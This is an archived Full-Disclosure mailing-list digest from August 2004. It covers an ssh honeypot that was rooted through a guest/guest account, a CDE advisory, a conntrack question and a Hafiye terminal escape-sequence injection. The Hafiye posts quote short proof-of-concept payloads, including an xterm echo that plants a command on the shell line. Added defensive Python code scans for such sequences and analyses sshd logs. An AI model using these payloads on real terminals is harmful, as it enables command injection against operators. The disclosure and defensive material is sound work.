
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
RE: !SPAM! [Full-Disclosure] Automated ssh scanning

From: Richard Verwayen (holleackw.de)
Date: Thu Aug 26 2004 - 06:07:35 CDT


On Thu, 2004-08-26 at 11:47, Yaakov Yehudi wrote:
> In spite of many reports to the contrary, Linux is _not_ secure by default.
> Did you harden it? There is a lot of documentation on the web as to how to
> go about it.
>
> YY
Hello Yaakov,

This system was a pure debian woody non-production one with all
services disabled - just ssh was left open in order to see what the
purpose of the scan was! Yes, there was a guest account with a weak
password (guest) on it!
And yes, they logged in and became root in no time. But I thought the
kernel compiled from the latest debian woody kernel-source could be
considered to be safe. But I was wrong! So I posted the tools used by
the attackers to this list and also to the debian security team.

Richard



 
Re: [Full-Disclosure] iDEFENSE Security Advisory 08.25.04:

From: Anonymous (criptoecn.org)
Date: Thu Aug 26 2004 - 02:37:00 CDT


At 01:45 PM 8/25/2004 -0400, idlabs-advisoriesidefense.com wrote:
>CDE libDtHelp LOGNAME Buffer Overflow Vulnerability

>US-CERT Vulnerability Note VU#575804, detailing the original attack
>vectors is available at:
>
>http://www.kb.cert.org/vuls/id/575804

>iDEFENSE has confirmed the existence of this vulnerability in Solaris 8
>and Solaris 9 without the patches provided for in Sun Alert 57414.

>VIII. DISCLOSURE TIMELINE
>
>03/04/2004 Initial vendor contact
> (Opengroup.org)
>03/04/2004 iDEFENSE clients notified
>03/31/2004 Initial vendor response
> (Opengroup.org - further coordination requested)
>04/19/2004 Initial vendor contact
> (Hewlett-Packard, IBM, and Sun Microsystems)
>04/19/2004 Initial vendor response (Sun Microsystems)
>04/20/2004 Initial vendor response (Hewlett-Packard)
>08/25/2004 Public disclosure

I am confused. Sun patched this on 30 April. HP patched as recently as February. IBM in November. The last change to the CERT VN was 4 November.

Why "disclose" this now?



 
[Full-Disclosure] Re: Hafiye-1.0 Terminal Escape Sequence Injection Vulnerability

From: Serkan Akpolat (sakpolatgmx.net)
Date: Tue Aug 24 2004 - 12:24:50 CDT


Rodrigo Barbosa wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Mon, Aug 23, 2004 at 09:32:15PM +0300, Serkan Akpolat wrote:
>
>>char *esc_sequence[]= {"Escape Sequences",
>> "\x1b""]2;Insecure?""\x07\x0a",
>> "\x07\x07\x07\x07\x07\x07",
>> "\x1b""]2;;echo Owned > /root/Owned.txt"
>> "\x07\x1b""[21t""\x1b""]2;xterm""\x07"
>> "Abnormal Termination""\x1b"
>> "[8m;""\x0a"};
>
>
> Looks like a traditional ANSI escape code "exploit" (or should I say
> abuse ?).
> I would blame this on the terminal, not on the Hafiye software itself.
>
> []s
>
> - --
> Rodrigo Barbosa <rodrigobsuespammers.org>
> "Quid quid Latine dictum sit, altum viditur"
> "Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.3 (GNU/Linux)
>
> iD8DBQFBK2TPpdyWzQ5b5ckRAmQmAKCC/JHgqFew7X5MPg7JwIZWGT3ZywCfURNQ
> Lg02GiczNMHvLbitgXLSc6c=
> =qau0
> -----END PGP SIGNATURE-----
>
>

Well, I would not blame this on terminal emulators.
And the escape sequences in the PoC exploit I wrote are not related to
the ANSI escape code "exploit".
They are features of terminal emulators.

echo -e "\e]2;;ls;\a\e[21t\abash-2.05b$\e[8m;"
You can try this one in xterm. You will see bash-2.05b$; if you type
some command and hit enter, the "ls" command in the escape sequence will be
executed too. (thanks to bloofar for the hint)

You can read more in the "TERMINAL EMULATOR SECURITY ISSUES" paper written
by H D Moore. The paper also covers old vulnerabilities in terminal
emulators.


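Added example (not from Serkan's post, the Hafiye code, or H D Moore's paper): a small Python scanner for the sequences the PoC above chains together. It parses OSC and CSI sequences out of untrusted text and flags the three that do the damage: OSC 0/1/2 (set the window title to attacker-chosen text), CSI 21 t (ask xterm to report the title back, which it does by writing it into the input stream, so the planted title lands on the shell's command line) and SGR 8 (conceal what follows, here the real prompt). sanitize() is what a sniffer or log viewer should do with attacker-controlled bytes before printing them to a terminal. The regexes, the POC constant (the echo string from the post as a Python literal), the caret notation for leftover control bytes and the choice to treat only those three kinds as dangerous are my assumptions; 7-bit ESC-introduced and 8-bit C1 forms are handled, private sequences of individual terminals are not.

```python
"""Detect and strip terminal escape sequences in untrusted text (added example)."""
import re
from typing import List, Tuple

# OSC: ESC ] or 0x9D, a body, terminated by BEL, ESC \ or 0x9C (ST)
_OSC_RE = re.compile(r"(?:\x1b\]|\x9d)(?P<body>[^\x07\x1b\x9c]*)(?:\x07|\x1b\\|\x9c)")
# CSI: ESC [ or 0x9B, parameter bytes, intermediate bytes, one final byte
_CSI_RE = re.compile(r"(?:\x1b\[|\x9b)(?P<params>[0-?]*)[ -/]*(?P<final>[@-~])")
# Leftover ESC plus one byte (ESC c reset, unterminated introducers, ...), stripped last
_ESC_TAIL_RE = re.compile(r"\x1b[@-_]")

# The echo string from the post, written as a Python literal (constructed for the test)
POC = "\x1b]2;;ls;\x07\x1b[21t\x07bash-2.05b$\x1b[8m;"


def scan(text: str) -> List[Tuple[str, str]]:
    """Return (kind, detail) for every escape sequence, in order of appearance.

    kinds: title-set, title-report, conceal, osc (any other OSC), csi (any other CSI)
    """
    found = []
    for m in _OSC_RE.finditer(text):
        code, _, payload = m.group("body").partition(";")
        if code in ("0", "1", "2"):  # xterm: set icon name and/or window title
            found.append((m.start(), "title-set", payload))
        else:
            found.append((m.start(), "osc", m.group("body")))
    for m in _CSI_RE.finditer(text):
        params, final = m.group("params"), m.group("final")
        fields = params.split(";")
        if final == "t" and fields[0] in ("20", "21"):  # xterm: report icon name / title
            found.append((m.start(), "title-report", params))
        elif final == "m" and "8" in fields:  # SGR 8: concealed (invisible) text
            found.append((m.start(), "conceal", params))
        else:
            found.append((m.start(), "csi", params + final))
    found.sort()
    return [(kind, detail) for _, kind, detail in found]


def is_dangerous(text: str) -> bool:
    """True if the text can plant input on, or hide output from, an xterm-like terminal."""
    kinds = {kind for kind, _ in scan(text)}
    return bool(kinds & {"title-set", "title-report", "conceal"})


def sanitize(text: str) -> str:
    """Strip every escape sequence; show remaining control bytes in caret notation (^G, ^[)."""
    text = _OSC_RE.sub("", text)
    text = _CSI_RE.sub("", text)
    text = _ESC_TAIL_RE.sub("", text)
    out = []
    for ch in text:
        code = ord(ch)
        if ch in "\n\t" or 0x20 <= code < 0x7F or code >= 0xA0:
            out.append(ch)
        else:  # C0 controls, DEL and C1 controls
            out.append("^" + chr((code ^ 0x40) & 0x7F))
    return "".join(out)


if __name__ == "__main__":
    print("findings:", scan(POC))
    print("dangerous:", is_dangerous(POC))
    print("safe to print:", sanitize(POC))
```

scan() tells you what a captured packet or log line would have done to the operator's terminal; sanitize() is the output filter to put in front of print() in anything that echoes network data. Colour SGRs like ESC[1;31m are reported as plain "csi" and stripped too, which is the right default for a sniffer.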

 
Re: [Full-Disclosure] Automated ssh scanning

From: andreasinferno.nadir.org
Date: Thu Aug 26 2004 - 03:47:51 CDT


Hi,

Do you have an image you can share with us?
Did you set up key logging?
If not, set up your honeypot again with better control over what
the intruder is doing.

regards,

andreas

On Thursday 26 August 2004 09:14, Richard Verwayen wrote:
> On Thu, 2004-08-26 at 03:11, David Vincent wrote:
> > >Hello list!
> > >
> > >A few weeks ago there was a discussion about automated ssh scanning with
> > >user/password combinations like guest/guest or admin/admin.
> > >I set up a debian woody fully patched with both accounts activated, and
> > >got rooted some days later...
> > >
> > >The attackers installed some software and irc-bots and tried to use this
> > >host for testing other computers, that's not the point. I would like to
> > >know where's the weak point in the system? As the system was updated on
> > >a daily basis! The only known weaknesses were these two accounts!
> >
> > you didn't set up admin/admin as root did you?
> >
> > just asking.
> >
> > -d
>
> Hello David,
>
> no I created only unprivileged user accounts! And the root password is
> not considered to be weak!
>
> Richard
>

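The pattern Richard set the honeypot up to observe (repeated attempts with stock user/password pairs such as guest/guest and admin/admin, then a successful login) is visible in sshd's auth log before anything gets rooted. What follows is an added example, not code from the thread: a Python pass over sshd syslog lines that counts failures per source address, notes when the usernames tried are default-account names, and reports a source that guessed its way to an accepted password login. The SAMPLE_LOG lines are constructed for the example (format modelled on OpenSSH's syslog output, accepting both the older "Illegal user" and the newer "Invalid user" wording); the thresholds and the DEFAULT_ACCOUNTS list are my assumptions.

```python
"""Flag SSH password guessing, and the login it led to, from sshd syslog lines (added example)."""
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample, not taken from the thread. Host, timestamps and addresses are invented
# (192.0.2.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = """\
Aug 26 02:11:03 woody sshd[1201]: Illegal user admin from 192.0.2.10
Aug 26 02:11:03 woody sshd[1201]: Failed password for illegal user admin from 192.0.2.10 port 40211 ssh2
Aug 26 02:11:05 woody sshd[1203]: Failed password for illegal user test from 192.0.2.10 port 40212 ssh2
Aug 26 02:11:07 woody sshd[1205]: Failed password for guest from 192.0.2.10 port 40213 ssh2
Aug 26 02:11:09 woody sshd[1207]: Accepted password for guest from 192.0.2.10 port 40214 ssh2
Aug 26 02:15:44 woody sshd[1220]: Failed password for richard from 198.51.100.7 port 51000 ssh2
Aug 26 02:15:50 woody sshd[1222]: Accepted publickey for richard from 198.51.100.7 port 51001 ssh2
"""

# Matches the Accepted/Failed lines; the bare "Illegal user ... from" line adds nothing here
_AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:(?:illegal|invalid) user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Usernames the scanners of the day tried first (assumed list; extend it from your own logs)
DEFAULT_ACCOUNTS = {"guest", "admin", "test", "user", "root", "oracle", "mysql", "www"}


def analyse(log: str, min_failures: int = 3) -> Dict[str, dict]:
    """Per source address: failure count, usernames tried, accepted logins and a verdict.

    verdict is "scan" when the source looks like a password guesser, "compromise" when a
    scanning source also obtained an Accepted password login, otherwise "ok".
    """
    per_ip: Dict[str, dict] = defaultdict(
        lambda: {"failed": 0, "users": set(), "accepted": []}
    )
    for line in log.splitlines():
        m = _AUTH_RE.search(line)
        if not m:
            continue
        rec = per_ip[m["ip"]]
        if m["result"] == "Failed":
            rec["failed"] += 1
            rec["users"].add(m["user"])
        else:
            rec["accepted"].append((m["user"], m["method"]))

    report: Dict[str, dict] = {}
    for ip, rec in per_ip.items():
        tried_defaults = rec["users"] & DEFAULT_ACCOUNTS
        # Many failures, or several usernames including a stock one: somebody is guessing
        is_scan = rec["failed"] >= min_failures or (
            len(rec["users"]) >= 2 and bool(tried_defaults)
        )
        password_logins = [u for u, method in rec["accepted"] if method == "password"]
        if is_scan and password_logins:
            verdict = "compromise"
        elif is_scan:
            verdict = "scan"
        else:
            verdict = "ok"
        report[ip] = {
            "failed": rec["failed"],
            "users": sorted(rec["users"]),
            "accepted": rec["accepted"],
            "verdict": verdict,
        }
    return report


def compromised_accounts(log: str) -> List[str]:
    """Usernames a scanning source logged into with a password: lock and reset these first."""
    hits = []
    for rec in analyse(log).values():
        if rec["verdict"] == "compromise":
            hits.extend(u for u, method in rec["accepted"] if method == "password")
    return sorted(set(hits))


if __name__ == "__main__":
    for ip, rec in analyse(SAMPLE_LOG).items():
        print(f"{ip:16} failed={rec['failed']:3} users={','.join(rec['users'])} -> {rec['verdict']}")
    print("accounts to lock:", compromised_accounts(SAMPLE_LOG))
```

Run it over /var/log/auth.log (or wherever syslog puts authpriv). A "scan" verdict before any Accepted line is the moment to act; after it, the thread's own conclusion applies, because once a guessable account exists the kernel patch level is all that stands between the attacker and root. On the sshd side, PasswordAuthentication no, PermitRootLogin no and an AllowUsers list in sshd_config would have stopped this particular scanner at the door.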

 
Re: [Full-Disclosure] Automated ssh scanning

From: Tig (tiggeronemoremonkey.com)
Date: Thu Aug 26 2004 - 07:31:35 CDT


On Wed, 25 Aug 2004 19:43:47 -0400
Gerry Eisenhaur <GEisenhaurCisco.com> wrote:

> I am confused, you said you knew about some SSH scanning going on,
> then set up those accounts on a box. Now you are curious why that box
> got rooted?
>
> Maybe I am missing something, but it seems you already have a pretty
> good assumption of why it got rooted.
>
> The software, as you seem to know, is a few exploits, a backdoor and
> some IRC stuff(bot and proxy).
>
> /gerry
>

I think you did miss the point (which was a very good one). Basically,
once you have unprivileged access to a currently patched Woody box, you
can quickly gain root access.

I would love to see this tested against other versions of Linux and *BSD
with default (and updated) installations. Anyone have a spare box and a
few hours?

-Tig



 
RE: !SPAM! [Full-Disclosure] Automated ssh scanning

From: Todd Towles (toddtowlesbrookshires.com)
Date: Thu Aug 26 2004 - 08:12:08 CDT


The kernel could be safe. But with weak passwords, you are toast. Any
automated tool would test guest/guest.

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Richard
Verwayen
Sent: Thursday, August 26, 2004 6:08 AM
To: 'FD'
Subject: RE: !SPAM! [Full-Disclosure] Automated ssh scanning

On Thu, 2004-08-26 at 11:47, Yaakov Yehudi wrote:
> In spite of many reports to the contrary, Linux is _not_ secure by
default.
> Did you harden it? There is a lot of documentation on the web as to
> how to go about it.
>
> YY
Hello Yaakov,

This system was a pure debian woody non-production one with all
services disabled - just ssh was left open in order to see what the
purpose of the scan was! Yes, there was a guest account with a weak
password (guest) on it!
And yes, they logged in and became root in no time. But I thought the
kernel compiled from the latest debian woody kernel-source could be
considered to be safe. But I was wrong! So I posted the tools used by
the attackers to this list and also to the debian security team.

Richard



 
RE: !SPAM! [Full-Disclosure] Automated ssh scanning

From: Richard Verwayen (holleackw.de)
Date: Thu Aug 26 2004 - 08:41:18 CDT


On Thu, 2004-08-26 at 15:12, Todd Towles wrote:
> The kernel could be safe. But with weak passwords, you are toast. Any
> automated tool would test guest/guest.
>
Hello Todd!

You are right about the passwords, but guest is only an unprivileged
account as you may have on many production machines. But they managed
to become root on this machine due to a kernel(?) exploit!
Should I then consider any woody system to be insecure to let people
work on?

Richard



 
Re: [Full-Disclosure] Automated ssh scanning

From: Gerry Eisenhaur (GEisenhaurCisco.com)
Date: Thu Aug 26 2004 - 09:06:42 CDT


Yeah, I boned it, I missed the point. For some reason (read: lack of sleep
and food), I misread/assumed that admin was an admin... stupid me...

/gerry

Tig wrote:
> On Wed, 25 Aug 2004 19:43:47 -0400
> Gerry Eisenhaur <GEisenhaurCisco.com> wrote:
>
>
>>I am confused, you said you knew about some SSH scanning going on,
>>then set up those accounts on a box. Now you are curious why that box
>>got rooted?
>>
>>Maybe I am missing something, but it seems you already have a pretty
>>good assumption of why it got rooted.
>>
>>The software, as you seem to know, is a few exploits, a backdoor and
>>some IRC stuff(bot and proxy).
>>
>>/gerry
>>
>
>
> I think you did miss the point (which was a very good one). Basically,
> once you have unprivileged access to a currently patched Woody box, you
> can quickly gain root access.
>
> I would love to see this tested against other version of Linux and *BSD
> with default (and updated) installations. Anyone have a spare box and a
> few hours?
>
> -Tig
>

--
Gerald Eisenhaur
Cisco Systems, Inc.
1414 Massachusetts Ave.
Boxborough, MASSACHUSETTS 01719
tel: 978.936.0465
geisenhaurcisco.com



 
RE: [Full-Disclosure] Automated ssh scanning

From: Todd Towles (toddtowlesbrookshires.com)
Date: Thu Aug 26 2004 - 09:03:46 CDT


Sorry, didn't see the other messages. So it got local access through
guest/guest and then gained root with a local exploit. Any ideas what it
is?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Todd Towles
Sent: Thursday, August 26, 2004 8:12 AM
To: Richard Verwayen; FD
Subject: RE: !SPAM! [Full-Disclosure] Automated ssh scanning

The kernel could be safe. But with weak passwords, you are toast. Any
automated tool would test guest/guest.

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Richard
Verwayen
Sent: Thursday, August 26, 2004 6:08 AM
To: 'FD'
Subject: RE: !SPAM! [Full-Disclosure] Automated ssh scanning

On Thu, 2004-08-26 at 11:47, Yaakov Yehudi wrote:
> In spite of many reports to the contrary, Linux is _not_ secure by
default.
> Did you harden it? There is a lot of documentation on the web as to
> how to go about it.
>
> YY
Hello Yaakov,

This system was a pure debian woody non-production one with all
services disabled - just ssh was left open in order to see what the
purpose of the scan was! Yes, there was a guest account with a weak
password (guest) on it!
And yes, they logged in and became root in no time. But I thought the
kernel compiled from the latest debian woody kernel-source could be
considered to be safe. But I was wrong! So I posted the tools used by
the attackers to this list and also to the debian security team.

Richard



 
RE: !SPAM! [Full-Disclosure] Automated ssh scanning

From: Todd Towles (toddtowlesbrookshires.com)
Date: Thu Aug 26 2004 - 09:19:18 CDT


That is a worry you should have. But we need to know how they did it
before we just assume it. Anyone tested it on another Linux system?
Fedora?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Richard
Verwayen
Sent: Thursday, August 26, 2004 8:41 AM
To: FD
Subject: RE: !SPAM! [Full-Disclosure] Automated ssh scanning

On Thu, 2004-08-26 at 15:12, Todd Towles wrote:
> The kernel could be safe. But with weak passwords, you are toast. Any
> automated tool would test guest/guest.
>
Hello Todd!

You are right about the passwords, but guest is only an unprivileged
account as you may have on many production machines. But they managed
to become root on this machine due to a kernel(?) exploit!
Should I then consider any woody system to be insecure to let people
work on?

Richard



 
Re: [Full-Disclosure] Netfilter Conntrack

From: Maxime Ducharme (mducharmecybergeneration.com)
Date: Thu Aug 26 2004 - 09:01:42 CDT


Hi

I believe function ctnl_del_conntrack from libctnetlink.c
may be helpful.

http://cvs.netfilter.org/libctnetlink/libctnetlink.c

netfilter-dev people do a lot of work and do not always have time
to answer every question; maybe being patient in the future
may help.

This is open-source software and people contribute on
their personal time ...

Hope this helps

Have a nice day

Maxime Ducharme
Programmer / Network Security Specialist

----- Original Message -----
From: VeNoMouS
To: full-disclosurelists.netsys.com
Sent: Monday, August 23, 2004 11:42 PM
Subject: [Full-Disclosure] Netfilter Conntrack

I know this is so not the right place to ask this, but most of the people
from netfilter-dev are total asshats and trying to get any sort of info from
them is a bitch.
</rant>

Does anyone know of a decent way to delete an entry from the conntrack (in
C)? I've written an LKM to try to access ip_conntrack_tuple and ip_conntrack to
list and delete from there, but so far my attempts have been worthless.

So I'm asking you guys for HELP!#!!!!

chur VeNoMouS....



 
RE: !SPAM! [Full-Disclosure] Automated ssh scanning

From: Ron DuFresne (dufresnewinternet.com)
Date: Thu Aug 26 2004 - 09:43:13 CDT


On Thu, 26 Aug 2004, Richard Verwayen wrote:

> On Thu, 2004-08-26 at 15:12, Todd Towles wrote:
> > The kernel could be safe. But with weak passwords, you are toast. Any
> > automated tool would test guest/guest.
> >
> Hello Todd!
>
> You are right about the passwords, but guest is only an unprivileged
> account as you may have on many production machines. But they managed
> to become root on this machine due to a kernel(?) exploit!
> Should I then consider any woody system to be insecure to let people
> work on?

If your users are not trustable, then they should not have access to
local systems of yours. Once a person has a shell, then they are 95% to
root.

Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
        ***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.



 
[Full-Disclosure] Notification

From: Advisories (advisoriescorsaire.com)
Date: Thu Aug 26 2004 - 10:27:04 CDT